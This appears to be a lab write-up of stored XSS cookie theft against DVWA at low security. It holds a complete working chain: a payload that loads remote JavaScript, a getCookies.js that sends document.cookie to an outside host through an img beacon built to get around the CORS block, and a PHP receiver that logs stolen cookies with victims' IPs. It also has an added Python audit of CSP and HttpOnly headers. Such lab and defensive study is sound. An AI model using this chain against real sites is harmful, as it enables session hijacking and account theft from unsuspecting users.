XSS Cookie Theft (DVWA platform test)
A competition question asked for a script that receives cookies, so I simulated the XSS environment to test one.
PS: WAF filtering is not considered.
The XSS used here is stored XSS, and the DVWA security level is set to low.
I hadn't written a web page for a long time and at first forgot that a request sent from an XSS payload is cross-origin.
First, put a JS file on the server and have the XSS payload load it.
Loading it is simple:
<script type="text/javascript" src="http://xxx.xxx.xxx.xx/getCookies.js"></script>
The code is easy to understand: the JS is loaded remotely, then a broken image is created and its error handler is used to call the cccgood() function from that JS.
getCookies.js:
    function cccgood() {
        // For ease of testing, IE is not considered; use Chrome.
        var xmlhttp = new XMLHttpRequest();
        xmlhttp.open("GET", "http://xxx.xxx.xxx.xxx/a.php?ccc=" + escape(document.cookie));
        xmlhttp.send();
    }
Unfortunately, the browser blocks the request: Origin null is not allowed by Access-Control-Allow-Origin.
So, another way: every src attribute is fetched with a GET request, so we can use an invisible img and put the URL in its src. The remote file is used because the payload length is limited. Write it as follows:
    function cccgood() {
        var img = document.createElement("img");
        img.src = "http://xxx.xxx.xxx.xxx/a.php?ccc=" + escape(document.cookie);
        document.body.appendChild(img); // append the element itself, not the string "img"
    }
The escape() function encodes the string so that it can be read on any computer, preventing special characters in the cookie from breaking the URL.
In this way, the cross-origin check is successfully avoided.
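As an added defensive check (not part of the original post), the following Python audits a site's response headers against the three steps this chain depends on: loading a remote script, reading the session cookie from document.cookie, and sending the img beacon. Both header sets are constructed samples; the first mirrors a DVWA-low style setup with no CSP and no HttpOnly flag, the second is a hardened configuration.

```python
# Constructed sample headers (not captured from a real server).
WEAK_HEADERS = {
    "Set-Cookie": ["security=low; path=/", "PHPSESSID=abc123; path=/"],
}
HARDENED_HEADERS = {
    "Set-Cookie": ["security=low; path=/",
                   "PHPSESSID=abc123; path=/; HttpOnly; SameSite=Lax"],
    "Content-Security-Policy": "default-src 'self'; script-src 'self'; img-src 'self' data:",
}

# Source expressions that never name a third-party host.
NON_REMOTE = {"'self'", "'none'", "'unsafe-inline'", "'unsafe-eval'", "data:"}


def csp_directives(header):
    """Split a Content-Security-Policy value into {directive: [sources]}."""
    out = {}
    for part in header.split(";"):
        tokens = part.split()
        if tokens:
            out[tokens[0].lower()] = tokens[1:]
    return out


def allows_remote(directives, name):
    """True if `name` (falling back to default-src) lets some third-party host load.

    Simplified: any source other than 'self'/'none'/nonce/hash/data: is treated as
    permitting a remote origin ('*', a scheme, or an explicit host).
    """
    sources = directives.get(name, directives.get("default-src"))
    if sources is None:
        return True  # no applicable directive: the browser imposes no restriction
    for src in sources:
        if src in NON_REMOTE or src.startswith(("'nonce-", "'sha")):
            continue
        return True
    return False


def audit(headers):
    """Report which steps of the cookie-theft chain the headers still leave open."""
    csp = csp_directives(headers.get("Content-Security-Policy", ""))
    session_readable = any(
        cookie.split("=", 1)[0].strip() == "PHPSESSID"
        and "httponly" not in [a.strip().lower() for a in cookie.split(";")[1:]]
        for cookie in headers.get("Set-Cookie", []))
    return {
        "remote_script_load": allows_remote(csp, "script-src"),   # <script src=...>
        "session_cookie_readable": session_readable,              # document.cookie
        "img_beacon": allows_remote(csp, "img-src"),              # img.src exfil
    }
```

Each True in the result is a step of the chain the configuration does not block; the hardened sample closes all three.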
The receiving PHP code (provided by my friend @Zero):
a.php:
    <?php
    if (isset($_GET['ccc'])) {
        if (!empty($_GET['ccc'])) {
            $ccc = date("y-m-d h:i:s ", time()) . " Cookies:" . $_GET['ccc'];
            $user_IP = $_SERVER["REMOTE_ADDR"];
            $content = "[" . $user_IP . "] " . $ccc;
            $fp = fopen("ccc.txt", "a");
            fwrite($fp, $content . "\r\n");
            fclose($fp);
            echo "Your Cookie :<br><br> $content<br><br><br>";
        }
    }